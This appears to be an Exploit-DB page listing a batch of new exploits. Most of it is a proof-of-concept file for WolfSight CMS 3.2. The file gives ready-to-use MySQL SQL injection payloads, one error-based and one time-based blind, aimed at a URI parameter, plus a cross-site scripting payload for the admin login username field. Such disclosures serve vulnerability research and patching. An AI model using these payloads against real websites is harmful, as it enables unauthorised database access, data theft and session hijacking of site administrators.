02fa7c70d3
9 changes to exploits/shellcodes HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit) HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit) OpenSSH < 6.6 SFTP (x64) - Command Execution OpenSSH < 6.6 SFTP - Command Execution ModSecurity 3.0.0 - Cross-Site Scripting Gitea 1.4.0 - Remote Code Execution WolfSight CMS 3.2 - SQL Injection Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution Elektronischer Leitz-Ordner 10 - SQL Injection D-Link DIR601 2.02 - Credential Disclosure
31 lines
No EOL
1 KiB
Text
31 lines
No EOL
1 KiB
Text
# Exploit Title: WolfSight CMS 3.2 - SQL Injection
|
||
# Google Dork: N/A
|
||
# Date: 2018-07-10
|
||
# Exploit Author: Berk Dusunur & Zehra Karabiber
|
||
# Vendor Homepage: http://www.wolfsight.com
|
||
# Software Link: http://www.wolfsight.com
|
||
# Version: v3.2
|
||
# Tested on: Parrot OS / WinApp Server
|
||
# CVE : N/A
|
||
|
||
# PoC Sql Injection
|
||
# Parameter: #1* (URI)
|
||
# Type: error-based
|
||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||
# Payload:
|
||
|
||
http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn
|
||
|
||
# Type: AND/OR time-based blind
|
||
# Title: MySQL >= 5.0.12 OR time-based blind
|
||
# Payload:
|
||
|
||
http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx
|
||
|
||
# PoC Cross-Site Scripting
|
||
# http://ip/admin/login.php
|
||
# Username
|
||
|
||
<IMG SRC=”javascript:alert(‘EZK’);”>
|
||
|
||
# This vulnerability was identified during bug bounty |